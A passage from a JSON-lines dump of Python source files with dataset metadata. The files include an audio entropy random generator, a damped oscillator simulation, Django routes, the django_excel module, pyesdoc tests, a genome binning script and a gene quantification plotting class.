(zeros and ones) kept in this array as binary strings\n\t\t\t\tbinary = \"\"\n\t\t\t\tfor i in range(L):\n\t\t\t\t\tpacked = struct.pack('>d', xArr[y-1][i]) # endianness; must be big endian (>)\n\t\t\t\t\tbinary = \"\".join(map(lambda x: format(x, 'b').zfill(8), packed ) )\n\t\t\t\t\tzArr.append( binary ) # the last 2 least significant bits of the float representation go into zArr\n\t\t\t\t\txArr[0][i] = xArr[y-1][i]\n\n\t\t\t\tfor i in range(L//2 ):\n\t\t\t\t\ttemp = swap(zArr[i + (L//2)])\n\t\t\t\t\tzArr[i] = xorStr(zArr[i], temp )\n\n\t\t\t\tfor i in range(L//2): # pick the first half of the zArr array after the change\n\t\t\t\t\tfor k in range(8):# 8-bit numbers go into the histogram\n\t\t\t\t\t\tcurNumber = zArr[i][k*8: k*8+8]\n\t\t\t\t\t\tNCounter+=1\n\t\t\t\t\t\toutput.append(int(curNumber, 2))\n\t\t\t\t\t# but 32-bit numbers are written to the file\n\t\t\t\t\tout1 = bytearray(int(binary[x:x+8], 2) for x in range(0, len(binary)//2, 8))\n\t\t\t\t\tout2 = bytearray(int(binary[x:x + 8], 2) for x in range(len(binary)//2, len(binary), 8))\n\t\t\t\t\tbinFile.write(out1) # first 32 bits of the 64-bit number\n\t\t\t\t\tbinFile.write(out2) # next 32 bits of the 64-bit number\n\t\t\tcounter 
+=1\n\t\t\tstartSample += L # take the next samples; maybe add an offset here as well?\n\treturn output\n\ndef calcEntropy(arr):# arr holds the numbers\n\txxd = {}\n\tfor i in range(len(arr)):\n\t\tif xxd.get(arr[i]) is not None:xxd[arr[i]] += 1\n\t\telse:xxd[arr[i]] = 1\n\tsuma = 0\n\tprobArr = [] # probArr holds the probabilities\n\tfor key in xxd:\n\t\tprobArr.append(xxd[key] / len(arr))\n\tfor p in probArr:\n\t\tsuma += -(p * math.log2(p))\n\treturn suma\n\nN = 256\nstartSample = 1000\nhowManyNumbers = 1000000\n\nprint(\"Capturing audio...\")\nsourceOutput = getAudio(howManyNumbers)\nstart = time.time()\nTRGNOutput = TRNG(sourceOutput, howManyNumbers, startSample, N)[:howManyNumbers]\nprint(\"Entropy only from source: \", calcEntropy(sourceOutput))\nprint(\"Entropy after processing: \", calcEntropy(TRGNOutput))\nprint(f\"Time needed just to generate {howManyNumbers} random numbers once the audio samples were already provided: {time.time() - start}s\" )\n\nfig, (axis1, axis2) = plt.subplots(2)\nfig.tight_layout(pad=5.0) # spacing between the subplots\n\nsourceOutput = sourceOutput[:howManyNumbers] # without this, sourceOutput is always a multiple of CHUNK (1024)\nweights = np.ones_like(sourceOutput) / (len(sourceOutput))\naxis1.hist(sourceOutput, bins=256, alpha=1, weights=weights)\naxis1.set_title(\"Before processing\")\naxis1.set_xlabel(f\"8-bit value, entropy: {calcEntropy(sourceOutput)}\")\naxis1.set_ylabel(\"Probability\")\n\naxis2.hist(TRGNOutput, bins=256, alpha=1, weights=weights)\n\naxis2.set_title(\"After processing\")\naxis2.set_xlabel(f\"8-bit value, entropy: {calcEntropy(TRGNOutput)}\")\naxis2.set_ylabel(\"Probability\")\n\nplt.show()\n\n","sub_path":"TrueRandomGenerator/BSTGeneratorv2.py","file_name":"BSTGeneratorv2.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"568893312","text":"from math import *\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef myPlot(t,P,x1,x2,xlabel,y1,y2,ylabel,title,filename):\n    fig1 = plt.figure()\n    plt.xlim(x1,x2)\n    plt.ylim(y1, y2)\n    plt.xlabel(xlabel)\n    plt.ylabel(ylabel)\n    plt.title(title)\n    plt.plot(t,P)\n    plt.savefig(filename)\n    plt.show()\n\ndef myPlot3x(x,y1,y2,y3,xlabel,y1label,y2label,y3label,title,filename):\n    fig1 = plt.figure()\n    #ax1 = fig1.add_subplot(3,1,1)\n    #ax2 = fig1.add_subplot(3, 1, 2)\n    #ax3 = fig1.add_subplot(3, 1, 3)\n\n    ax1 = plt.subplot(311)\n    plt.xlim(min(x),max(x))\n    plt.ylim(min(y1), max(y1))\n    plt.ylabel(y1label)\n    plt.title(title)\n    plt.plot(x,y1)\n\n    ax2 = plt.subplot(312,sharex=ax1)\n    plt.ylim(min(y2), max(y2))\n    plt.ylabel(y2label)\n    plt.plot(x, y2)\n\n    ax3 = plt.subplot(313,sharex=ax1)\n    plt.ylim(min(y3), max(y3))\n    plt.xlabel(xlabel)\n    plt.ylabel(y3label)\n    plt.plot(x, y3)\n\n    plt.savefig(filename)\n    plt.show()\n\n\n\n#Mod. 3.2 Damped Harmonic Oscillator\n#Problem Parameters\nt_0 = 0.0 #seconds\nm = 0.2 #kg\ng = 9.81 #m/s^2\nk = m #N/m spring const (This is assuming that w=1 in this project)\nu = 0.1 #This is the parameter = b/(2*m)\nb = u*2*m #damping coeff. 
determined from set value of u\ns_1 = 1.0 #meters\ns_2 = s_1 + m*g/k #meters\ninit_displacement = 0.5 #meters the amount we perturb the system\ns_0 = s_2 + init_displacement #meters this is the starting location of the mass\nv_0 = 0.0 #m/s the mass starts from rest\n\n\ndelta_t=0.02 #seconds\n\nf_restore = -k*(s_0-s_1) #N the force that the spring exerts to return to equilibrium\nf_damp = -b*v_0 #damping force (always opposite motion)\nf_net = f_restore + m*g #N the net force of the spring and the weight\na_0 = f_net/m #m/s^2 this is the accel due to net force of weight and spring\n\nt = [t_0]\ns = [s_0]\nv = [v_0]\na = [a_0]\n\ndelta_v = 0\ndelta_s=0\nt_max = 15.0 #s how long to run the sim\n#epsilon_stop = 1e-2\n#epsilon = 1.1*epsilon_stop\ncounter=0\n\nwhile t[counter] < t_max:\n    counter+=1 #increment counter (0->1 on first trip through)\n    t_curr=t[counter-1]+delta_t #get the current time by adding delta_t\n    t.append(t_curr) #add this time to the time list\n    delta_v = a[counter-1] * delta_t #calc delta_v based on previous accel\n    v.append(v[counter - 1] + delta_v) #add new v to v list\n    delta_s = v[counter] * delta_t #calc delta_s based on current v\n    s.append(s[counter - 1] + delta_s) #add new s to s list\n    f_restore = -k * (s[counter] - s_2) #N the force that the spring exerts to return to equilibrium\n    f_damp = -b * v[counter] #N damping force (always opposite motion)\n    f_net = f_restore + f_damp + m * g #N the net force of the spring and the weight\n    a.append(f_net/m) #add new a to a list\n\n\n\ntitle_base = \"Damped Harmonic Oscillator\"\ntitle = title_base + \" delta_t = \" + str(delta_t)\nfilename = \"mod32_damped_oscillator_\" + str(delta_t) + \"_all.png\"\nxlabel = \"t (s)\"\ny1label = \"a (m/s^2)\"\ny2label = \"v (m/s)\"\ny3label = \"s (m)\"\n\nmyPlot3x(t,a,v,s,xlabel,y1label,y2label,y3label,title,filename)\n\n\"\"\"\ntitle_base = \"Damped Harmonic Oscillator\"\ntitle = title_base + \" delta_t = \" + str(delta_t)\nfilename = \"mod32_damped_oscillator_\" + str(delta_t) + \"_a.png\"\nxlabel = \"t (s)\"\nylabel = \"a (m/s^2)\"\nmyPlot(t,a,min(t),max(t),xlabel, min(a),max(a),ylabel, title,filename)\n\n\nfilename = \"mod32_damped_oscillator_\" + str(delta_t) + \"_v.png\"\nylabel = \"v (m/s)\"\nmyPlot(t,v,min(t),max(t),xlabel, min(v),max(v),ylabel, title,filename)\n\nfilename = \"mod32_damped_oscillator_\" + str(delta_t) + \"_s.png\"\nylabel = \"s (m)\"\nmyPlot(t,s,min(t),max(t),xlabel, min(s),max(s),ylabel, title,filename)\n\"\"\"\n\n\n\n\n\n","sub_path":"project3.2_3.py","file_name":"project3.2_3.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445522293","text":"from django.urls import path\n\nfrom waterpurifier.delivery.views import (AddOrderView, CustomerCreateView, CustomerDeleteView, CustomerListView,\n                                          CustomerUpdateView, DeviceCreateView, DeviceDeleteView, DeviceListView,\n                                          DeviceUpdateView, OrderDeleteView, OrderListView, OrderUpdateView, Home)\n\n\napp_name = \"delivery\"\nurlpatterns = [\n    path(\"\", Home.as_view(), name=\"home\"),\n    path(\"customers/\", CustomerListView.as_view(), name=\"customer-list\"),\n    path(\"customers/create/\", CustomerCreateView.as_view(), name=\"customer-create\"),\n    path(\"customers/<int:pk>/\", CustomerUpdateView.as_view(), name=\"customer-update\"),\n    path(\n        \"customers/<int:pk>/delete/\",\n        CustomerDeleteView.as_view(),\n        name=\"customer-delete\",\n    ),\n    path(\n        \"customers/<int:pk>/addorder/\", AddOrderView.as_view(), name=\"customer-addorder\"\n    ),\n 
path(\"devices/\", DeviceListView.as_view(), name=\"device-list\"),\n    path(\"devices/create/\", DeviceCreateView.as_view(), name=\"device-create\"),\n    path(\"devices/<int:pk>/\", DeviceUpdateView.as_view(), name=\"device-update\"),\n    path(\"devices/<int:pk>/delete/\", DeviceDeleteView.as_view(), name=\"device-delete\"),\n    path(\"orders/\", OrderListView.as_view(), name=\"order-list\"),\n    path(\"orders/<int:pk>/\", OrderUpdateView.as_view(), name=\"order-update\"),\n    path(\"orders/<int:pk>/delete/\", OrderDeleteView.as_view(), name=\"order-delete\"),\n]\n","sub_path":"waterpurifier/delivery/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"538450159","text":"\"\"\"\n    django_excel\n    ~~~~~~~~~~~~~~~~~~~\n\n    A django middleware that provides one application programming interface\n    to read and write data in different excel file formats\n\n    :copyright: (c) 2015 by Onni Software Ltd.\n    :license: New BSD License\n\"\"\"\nfrom django.core.files.uploadhandler import (\n    MemoryFileUploadHandler, TemporaryFileUploadHandler)\nfrom django.core.files.uploadedfile import (\n    InMemoryUploadedFile, TemporaryUploadedFile)\nfrom django.http import HttpResponse\nimport pyexcel as pe\nimport pyexcel_webio as webio\n\n\nclass ExcelMixin(webio.ExcelInput):\n    def _get_file_extension(self):\n        extension = self.name.split(\".\")[1]\n        return extension\n\n    def load_single_sheet(self, sheet_name=None, **keywords):\n        return pe.get_sheet(\n            file_type=self._get_file_extension(),\n            file_content=self.file.read(),\n            sheet_name=sheet_name,\n            **keywords)\n\n    def load_book(self, **keywords):\n        return pe.get_book(\n            file_type=self._get_file_extension(),\n            file_content=self.file.read(),\n            **keywords)\n\n    def save_to_database(self, model=None,\n                         sheet_name=None,\n                         name_columns_by_row=0,\n                         name_rows_by_column=-1,\n                         **keywords):\n        sheet = self.load_single_sheet(\n            sheet_name=sheet_name,\n            name_columns_by_row=name_columns_by_row,\n            name_rows_by_column=name_rows_by_column,\n            **keywords)\n        if sheet:\n            sheet.save_to_django_model(model, **keywords)\n\n    def save_book_to_database(self, models=None, **keywords):\n        book = self.load_book(**keywords)\n        if book:\n            book.save_to_django_models(models, **keywords)\n\n\nclass ExcelInMemoryUploadedFile(ExcelMixin, InMemoryUploadedFile):\n    pass\n\n\nclass TemporaryUploadedExcelFile(ExcelMixin, TemporaryUploadedFile):\n    pass\n\n\nclass ExcelMemoryFileUploadHandler(MemoryFileUploadHandler):\n    def file_complete(self, file_size):\n        if not self.activated:\n            return\n        self.file.seek(0)\n        return ExcelInMemoryUploadedFile(\n            file=self.file,\n            field_name=self.field_name,\n            name=self.file_name,\n            content_type=self.content_type,\n            size=file_size,\n            charset=self.charset,\n            content_type_extra=self.content_type_extra\n        )\n\n\nclass TemporaryExcelFileUploadHandler(TemporaryFileUploadHandler):\n    def new_file(self, file_name, *args, **kwargs):\n        \"\"\"\n        Create the file object to append to as data is coming in.\n        \"\"\"\n        super(TemporaryFileUploadHandler, self).new_file(\n            file_name,\n            *args,\n            **kwargs)\n        self.file = TemporaryUploadedExcelFile(\n            self.file_name,\n            self.content_type,\n            0,\n            self.charset,\n            self.content_type_extra)\n\n\nwebio.ExcelResponse = HttpResponse\n\n\nfrom pyexcel_webio import (\n    make_response,\n    make_response_from_array,\n    make_response_from_dict,\n    make_response_from_records,\n    make_response_from_book_dict,\n    make_response_from_query_sets\n)\n\n\ndef make_response_from_a_table(model, file_type, 
status=200, **keywords):\n \"\"\"\n Produce a single sheet Excel book of *file_type*\n\n :param model: a Django model\n :param file_type: same as :meth:`~django_excel.make_response`\n :param status: same as :meth:`~django_excel.make_response`\n \"\"\"\n sheet = pe.get_sheet(model=model, **keywords)\n return make_response(sheet, file_type, status, **keywords)\n\n\ndef make_response_from_tables(models, file_type, status=200, **keywords):\n \"\"\"\n Produce a multiple sheet Excel book of *file_type*. It becomes the same\n as :meth:`~django_excel.make_response_from_a_table` if you pass *tables*\n with an array that has a single table\n\n :param models: a list of Django models\n :param file_type: same as :meth:`~django_excel.make_response`\n :param status: same as :meth:`~django_excel.make_response`\n \"\"\"\n book = pe.get_book(models=models, **keywords)\n return make_response(book, file_type, status, **keywords)\n","sub_path":"django_excel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"285297056","text":"\"\"\"\n### Print all the keys and values for a dictionary\n\nGiven a dictionary print all its keys and values separated by a dash \"-\".\nExample:\n\n my_dict = {\n 'company': 'Apple Inc',\n 'stock': 'AAPL'\n }\n print_keys_vals_dictionary(my_dict)\n # Should print:\n # company - \"Apple Inc\"\n # stock - \"AAPL\"\n\"\"\"\n\nmy_dict = {\n 'company': 'Apple Inc',\n 'stock': 'AAPL',\n 'prices_today': [126.41, 126.40, 126.43, 126.59, 126.190, 126.41],\n 'key_people': {\n 'CEO': 'Tim Cook',\n 'CTO': 'Will and Chad',\n }\n}\n\n\n# company - Apple Inc\nprint('company' + ' - ' + my_dict['company'])\nprint('stock' + ' - ' + my_dict['stock'])\nprint(\"Prices for today: \" + str(my_dict['prices_today']))","sub_path":"class-12/santi/santi.py","file_name":"santi.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"461332829","text":"N = list(map(int, input().split()))\nif len(N) == 3:\n print(*N)\nelse:\n max1 = N[0]\n min1 = N[0]\n for n in N:\n if n > max1:\n max1 = n\n if n < min1:\n min1 = n\n N.remove(max1)\n N.remove(min1)\n max2 = N[0]\n min2 = N[0]\n for n in N:\n if n > max2:\n max2 = n\n if n < min2:\n min2 = n\n N.remove(max2)\n max3 = N[0]\n for n in N:\n if n > max3:\n max3 = n\n p1 = min1 * min2 * max1\n p2 = max1 * max2 * max3\n if p1 > p2:\n print(min1, min2, max1)\n else:\n print(max1, max2, max3)\n","sub_path":"Week5/w5.py","file_name":"w5.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"538266954","text":"\"\"\"\n.. module:: test_general.py\n\n :copyright: @2013 Earth System Documentation (http://es-doc.org)\n :license: GPL / CeCILL\n :platform: Unix, Windows\n :synopsis: Executes pyesdoc general tests.\n\n.. 
moduleauthor:: Earth System Documentation (ES-DOC) \n\n\"\"\"\n# Module imports.\nimport inspect\n\nimport nose.tools\n\nimport pyesdoc\nimport test_utils as tu\nimport test_types as tt\n\n\n\n# Test ontology constants.\n_CIM = 'cim'\n_CIM_V1 = '1'\n_CIM_PACKAGE = 'software'\n_CIM_TYPE = 'modelComponent'\n\n# Test constants.\n_INSTITUTE = 'TEST'\n_PROJECT = 'TEST'\n\n\ndef _create_doc(ontology=_CIM,\n version=_CIM_V1,\n package=_CIM_PACKAGE,\n typeof=_CIM_TYPE):\n \"\"\"Creates a test document.\"\"\"\n type_key = \".\".join([ontology, version, package, typeof])\n\n return pyesdoc.create(type_key, _INSTITUTE, _PROJECT)\n\n\ndef _assert_doc(doc, typeof=None):\n \"\"\"Perform standard test document assertions.\"\"\"\n tu.assert_object(doc, typeof)\n if hasattr(doc, 'meta'):\n tu.assert_str(doc.meta.institute, _INSTITUTE.lower())\n tu.assert_str(doc.meta.language, pyesdoc.ESDOC_DEFAULT_LANGUAGE)\n tu.assert_str(doc.meta.project, _PROJECT.lower())\n\n\ndef _test_module_setup(mod):\n \"\"\"Test that the test document module is correctly setup.\"\"\"\n tu.assert_bool(mod in tt.MODULES, True)\n tu.assert_bool(mod in tt.INITIAL_STATE, True)\n for field in tt.STATE_FIELDS:\n tu.assert_bool(hasattr(mod, field), True)\n\n\ndef _test_version():\n \"\"\"Test package version.\"\"\"\n tu.assert_str(pyesdoc.__version__, \"0.9.0.3\")\n\n\ndef _test_module_reset(mod):\n \"\"\"Test that the test document modules are correctly reset.\"\"\"\n # Assert module state is cached.\n assert mod in tt.INITIAL_STATE\n\n # Update state.\n for field in tt.STATE_FIELDS:\n setattr(mod, field, \"XXX\")\n tu.assert_str(getattr(mod, field), \"XXX\")\n\n # Reset.\n tt.reset(mod)\n\n # Assert initial state.\n for field in tt.STATE_FIELDS:\n state = tt.INITIAL_STATE[mod][field]\n assert getattr(mod, field) == state\n\n\ndef _test_module_file_open(mod):\n \"\"\"Test opening module test files.\"\"\"\n assert tu.get_test_file(mod.DOC_FILE) is not None\n\n\ndef _test_create_01():\n \"\"\"Test creating documents - 1.\"\"\"\n doc = _create_doc()\n _assert_doc(doc, pyesdoc.ontologies.cim.v1.ModelComponent)\n\n\ndef _test_create_02():\n \"\"\"Test creating documents - 2.\"\"\"\n for ontology, version, package, typeof in pyesdoc.list_types():\n doc = _create_doc(ontology, version, package, typeof)\n _assert_doc(doc)\n type_key = \"{0}.{1}.{2}.{3}\".format(ontology, version, package, typeof)\n tu.assert_str(doc.__class__.type_key, type_key)\n\n\ndef _test_create_03():\n \"\"\"Test creating documents - 3.\"\"\"\n for doc_type in pyesdoc.get_types():\n doc = pyesdoc.create(doc_type, _INSTITUTE, _PROJECT)\n _assert_doc(doc, doc_type)\n\n\ndef _test_import(mod):\n \"\"\"Test module import.\"\"\"\n assert inspect.ismodule(mod)\n\n\ndef test_imports_01():\n \"\"\"Test importing packages - 1.\"\"\"\n for mod in (\n pyesdoc,\n pyesdoc.constants,\n pyesdoc.factory,\n pyesdoc.io,\n pyesdoc.ontologies,\n pyesdoc.options,\n pyesdoc.parsing,\n pyesdoc.parsing.default,\n pyesdoc.parsing.parser,\n pyesdoc.publishing,\n pyesdoc.serialization,\n pyesdoc.utils,\n pyesdoc.utils.convert,\n pyesdoc.utils.functional,\n pyesdoc.utils.runtime,\n pyesdoc.validation,\n pyesdoc.validation.graph,\n pyesdoc.validation.validator,\n ):\n tu.init(_test_import, \"import module\", mod)\n yield _test_import, mod\n\n\ndef test_imports_02():\n \"\"\"Test importing packages - 2.\"\"\"\n cim = pyesdoc.ontologies.cim\n for mod in (\n cim,\n cim.v1,\n cim.v1.decoder,\n cim.v1.decoder_for_activity_package,\n cim.v1.decoder_for_data_package,\n cim.v1.decoder_for_grids_package,\n 
cim.v1.decoder_for_misc_package,\n        cim.v1.decoder_for_quality_package,\n        cim.v1.decoder_for_shared_package,\n        cim.v1.decoder_for_software_package,\n        cim.v1.typeset,\n        cim.v1.typeset_for_activity_package,\n        cim.v1.typeset_for_data_package,\n        cim.v1.typeset_for_grids_package,\n        cim.v1.typeset_for_misc_package,\n        cim.v1.typeset_for_quality_package,\n        cim.v1.typeset_for_shared_package,\n        cim.v1.typeset_for_software_package,\n        cim.v1.typeset_meta,\n        ):\n        tu.init(_test_import, \"import cim module\", mod)\n        yield _test_import, mod\n\n\ndef _test_is_supported_ontology():\n    \"\"\"Test supported ontologies.\"\"\"\n    # supported\n    assert pyesdoc.is_supported(_CIM, _CIM_V1)\n\n    # unsupported\n    assert not pyesdoc.is_supported('x', _CIM_V1)\n    assert not pyesdoc.is_supported(_CIM, 'x')\n\n\ndef _test_is_supported_type_01():\n    \"\"\"Test supported ontology types - positive.\"\"\"\n    # supported\n    assert pyesdoc.is_supported(_CIM, _CIM_V1, _CIM_PACKAGE, _CIM_TYPE)\n    for ontology, version, package, typeof in pyesdoc.list_types():\n        assert pyesdoc.is_supported(ontology, version, package, typeof)\n\n\ndef _test_is_supported_type_02():\n    \"\"\"Test supported ontology types - negative.\"\"\"\n    # unsupported\n    assert not pyesdoc.is_supported('x', _CIM_V1, _CIM_PACKAGE, _CIM_TYPE)\n    assert not pyesdoc.is_supported(_CIM, 'x', _CIM_PACKAGE, _CIM_TYPE)\n    assert not pyesdoc.is_supported(_CIM, _CIM_V1, 'x', _CIM_TYPE)\n    assert not pyesdoc.is_supported(_CIM, _CIM_V1, _CIM_PACKAGE, 'x')\n\n\ndef _test_list_types():\n    \"\"\"Test listing supported types.\"\"\"\n    # supported - all\n    types = pyesdoc.list_types()\n    tu.assert_int(len(types), 103)\n\n    # supported - cim v1\n    types = pyesdoc.list_types(_CIM, _CIM_V1)\n    tu.assert_int(len(types), 103)\n\n    # unsupported\n    types = pyesdoc.list_types('x', 'x')\n    tu.assert_int(len(types), 0)\n\n\ndef _test_set_option_01():\n    \"\"\"Test setting package options - positive.\"\"\"\n    api_url = 'http://es-doc.org'\n    api_url_old = pyesdoc.get_option('api_url')\n    pyesdoc.set_option('api_url', api_url)\n    tu.assert_str(api_url, pyesdoc.get_option('api_url'))\n    pyesdoc.set_option('api_url', api_url_old)\n\n\n@nose.tools.raises(pyesdoc.PYESDOC_Exception)\ndef _test_set_option_02():\n    \"\"\"Test setting package options - negative.\"\"\"\n    pyesdoc.set_option('xxx', 'xxx')\n\n\ndef test():\n    \"\"\"Runs set of general unit tests.\"\"\"\n    for mod in tt.MODULES:\n        tu.init(_test_module_file_open, 'open document module test file', mod)\n        yield _test_module_file_open, mod\n\n    for mod in tt.MODULES:\n        tu.init(_test_module_reset, 'document module reset', mod)\n        yield _test_module_reset, mod\n\n    for mod in tt.MODULES:\n        tu.init(_test_module_setup, 'document module setup', mod)\n        yield _test_module_setup, mod\n\n    for func in (\n        _test_version,\n        _test_set_option_01,\n        _test_set_option_02,\n        _test_is_supported_ontology,\n        _test_is_supported_type_01,\n        _test_is_supported_type_02,\n        _test_list_types,\n        _test_create_01,\n        _test_create_02,\n        _test_create_03,\n        ):\n        tu.init(func, func.__doc__[5:])\n        yield func\n\n","sub_path":"tests/test_general.py","file_name":"test_general.py","file_ext":"py","file_size_in_byte":7247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"495799420","text":"#!/usr/bin/env python\nfrom __future__ import division, print_function\nimport argparse\nimport sys\n\nimport cooler\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(\n        description=\"Output a genome segmentation of fixed-size bins as a BED file.\")\n 
parser.add_argument(\n \"chromsizes\",\n help=\"UCSC-like chromsizes file, with chromosomes in desired order\",\n metavar=\"CHROMSIZES_PATH\")\n parser.add_argument(\n \"binsize\",\n help=\"Resolution (bin size) in base pairs \",\n metavar=\"BINSIZE\")\n parser.add_argument(\n \"--out\", \"-o\",\n help=\"Output file (defaults to stdout)\")\n args = vars(parser.parse_args())\n\n binsize = int(args['binsize'])\n chromsizes = cooler.read_chromsizes(args['chromsizes'])\n bins = cooler.binnify(chromsizes, binsize)\n\n # Write output\n out = args['out']\n f = sys.stdout if out is None else open(out, 'wt')\n try:\n bins.to_csv(f, sep='\\t', index=False, header=False)\n except OSError:\n pass\n finally:\n if f is not sys.stdout:\n f.close()\n","sub_path":"scripts/make_bins.py","file_name":"make_bins.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"278033944","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n# muisc\n\nimport requests\nimport re\nimport webbrowser\n\nurl = 'http://music.baidu.com/search?'\nword = '在人间'\n### Baidu Music search URL: url\n### search keyword: word\nheaders = {'user-agent': 'my-app/0.Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.75 Mobile/14E5239e Safari/602.10.1'}\n### access with a mobile user agent\nkey = {'key': word}\nr = requests.get(url, params=key)\ncode = requests.get(r.url, headers=headers)\nhtml = code.text\n### pass the keyword to the Baidu Music mobile page and fetch its source\nprint (r.url)\nwebbrowser.open(r.url, new=0, autoraise=True)\n### open the page\n","sub_path":"python/py/muisc.py","file_name":"muisc.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"354851316","text":"import csv\nimport sys\nfrom collections import defaultdict\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport matplotlib.colors as colors\nimport matplotlib.cm as cm\nfrom bokeh.plotting import figure, ColumnDataSource\nfrom bokeh.charts import Bar\nfrom bokeh.layouts import column\nfrom bokeh.models import (HoverTool, BoxZoomTool, ResetTool, PanTool,\n WheelZoomTool)\nfrom bokeh.resources import CDN\nfrom bokeh.embed import file_html\n\n\nclass GeneQuantiViz(object):\n \n def __init__(self, gene_wise_quanti_combined_path, lib_names, output_path,\n use_antisense=True, axis_min=None, axis_max=None):\n self._gene_wise_quanti_combined_path = gene_wise_quanti_combined_path\n self._output_path = output_path\n self._lib_names = lib_names\n self._use_antisense = use_antisense\n self._axis_min = axis_min\n self._axis_max = axis_max\n\n def parse_input_table(self):\n self._lib_names_and_countings = defaultdict(list)\n # Dict of dict of dict:\n # lib name -> relative direction (sense/anti-sense)\n # -> annotation type (CDS, rRNA ..)\n self._lib_names_and_class_quanti = defaultdict(\n lambda: defaultdict(lambda: defaultdict(float)))\n for row in csv.reader(\n open(self._gene_wise_quanti_combined_path), delimiter=\"\\t\"):\n if row[0].startswith(\"Orientation\"):\n continue\n for index, cell in enumerate(row[10:]):\n self._lib_names_and_countings[\n self._lib_names[index]].append(float(cell))\n self._lib_names_and_class_quanti[\n self._lib_names[index]][row[0]][row[3]] += float(cell)\n self.file_handle_bokeh()\n\n def file_handle_bokeh(self):\n data_bokeh_overview = []\n gene_quanti_combined_raw = pd.read_csv(\n 
self._gene_wise_quanti_combined_path, sep='\\t', index_col=False)\n attr_dic = []\n for index, row in gene_quanti_combined_raw.iterrows():\n attr_dic.append(self._dictionary_attributes(row))\n df_attributes = pd.DataFrame(attr_dic)\n gene_quanti_combined_raw = pd.concat([\n gene_quanti_combined_raw, df_attributes], axis=1, join_axes=[\n gene_quanti_combined_raw.index])\n gene_quanti_combined_raw.drop(\"Attributes\", axis=1, inplace=True)\n data_bokeh_overview.append(\n self._plotting_data_bokeh_overview(gene_quanti_combined_raw))\n self._plot_bokeh_read_no_per_lib(\n gene_quanti_combined_raw, data_bokeh_overview)\n\n def _plotting_data_bokeh_overview(self, gene_quanti_combined_raw):\n gene_quanti_combined_raw = gene_quanti_combined_raw.rename(\n columns={\n 'Orientation of counted reads relative to the strand location '\n 'of the annotation': 'Orientation'})\n orientation_list = []\n for orientation, df_rest in gene_quanti_combined_raw.groupby(\n 'Orientation'):\n orientation_list.append(orientation)\n feature_list = []\n for feature, df_rest in gene_quanti_combined_raw.groupby('Feature'):\n feature_list.append(feature)\n library = []\n feature_orientation = []\n count = []\n for lib_name in self._lib_names:\n library.append(lib_name)\n for orientation in orientation_list:\n for feature in feature_list:\n df_intermediate = gene_quanti_combined_raw[\n (gene_quanti_combined_raw.Orientation == orientation) & (\n gene_quanti_combined_raw.Feature == feature)]\n feature_orientation.append('%s (%s)' % (\n feature, orientation))\n count.append(sum(df_intermediate[lib_name]))\n libraries = [\n item for item in library for i in range(len(feature_list) * len(\n orientation_list))]\n data_set = {}\n data_set['Library'] = libraries\n data_set['Features_Orientation'] = feature_orientation\n data_set['Gene count'] = count\n self.create_csv(data_set)\n self.plot_correlations()\n self.plot_annotation_class_quantification(orientation_list)\n return data_set\n\n def create_csv(self, data_set):\n with open(self._output_path + '/Read No per RNA class.csv',\n 'w') as csv_file:\n writer = csv.writer(csv_file, delimiter='\\t')\n for key, value in data_set.items():\n writer.writerow([key] + value)\n \n def plot_correlations(self):\n self._prepare_document(self._output_path + '/Correlation.pdf')\n if self._axis_min is None:\n self._axis_min = 0.1\n if self._axis_max is None:\n self._set_axis_max()\n for lib_1 in self._lib_names:\n for lib_2 in self._lib_names:\n if lib_1 == lib_2:\n continue\n self._plot_correlation(lib_1, lib_2)\n self._close_document()\n\n def _prepare_document(self, file_name):\n self._pp = PdfPages(file_name)\n\n def _close_document(self):\n self._pp.close()\n\n def _plot_correlation(self, lib_1, lib_2):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_aspect(1)\n ax.set_yscale('log')\n ax.set_xscale('log')\n # Draw line\n plt.plot([self._axis_min, self._axis_max],\n [self._axis_min, self._axis_max],\n linestyle=\"solid\", color=\"green\", alpha=0.4)\n # Calculate the Pearson correlation coefficient\n corr_coeff = np.corrcoef(self._lib_names_and_countings[lib_1],\n self._lib_names_and_countings[lib_2])[0][1]\n # Set axis ranges\n plt.axis([self._axis_min, self._axis_max,\n self._axis_min, self._axis_max])\n plt.title(\"%s vs. 
